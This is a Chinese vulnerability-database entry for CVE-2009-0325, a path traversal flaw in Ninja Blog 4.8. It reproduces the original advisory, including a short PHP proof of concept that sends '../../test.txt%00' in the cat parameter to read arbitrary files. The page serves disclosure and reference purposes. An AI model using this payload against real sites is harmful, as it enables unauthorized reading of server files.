Ninja Blog index.php目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117262 漏洞类型 路径遍历
发布时间 2009-01-19 更新时间 2009-01-29
CVE编号 CVE-2009-0325 CNNVD-ID CNNVD-200901-421
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/7831
https://cxsecurity.com/issue/WLB-2009020064
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-421
|漏洞详情
NinjaBlog4.8版本中的entries/index.php存在目录遍历漏洞。当magic_quotes_gpc被中止时,远程攻击者可以借助cat参数中的"..",读取任意文件。
|漏洞EXP
Vendor: http://ninjadesigns.co.uk
Version(s): Ninja Blog 4.8 (May also affect earlier versions)
Credit: Danny Moules
Critical: Yes

See PUSH 55 Advisory at http://www.push55.co.uk/index.php?s=ad&id=6

----

Due to insufficient validation of client-side data, we can alter the path of files to be read to a file outside the intended directory.

The following PoC will read a file named 'test.txt' one level above the application folder.

---

<?php

$strToRead = "../../test.txt%00"; //Designates 'test.txt', sat one level above the application folder, to be read
$strSite = "http://www.example.com/ninjablog4.8/"; //Don't forget the trailing slash

$objCurl = curl_init();
curl_setopt($objCurl, CURLOPT_URL, $strSite."entries/index.php?cat=".$strToRead);
curl_setopt($objCurl, CURLOPT_RETURNTRANSFER, true);

echo("Getting data...\n");
$strDump = curl_exec($objCurl);

curl_close($objCurl);

echo("<div style=\"border: solid 2px black; padding: 10px; margin: 10px;\">$strDump</div>\n");

?>

# milw0rm.com [2009-01-19]
|参考资料

来源:MISC
链接:https://www.push55.co.uk/poclibrary/ninjadesignscouk-1.txt
来源:BID
名称:33351
链接:http://www.securityfocus.com/bid/33351
来源:MISC
链接:http://www.push55.co.uk/index.php?s=ad&id=6
来源:MILW0RM
名称:7831
链接:http://www.milw0rm.com/exploits/7831
来源:SECUNIA
名称:33573
链接:http://secunia.com/advisories/33573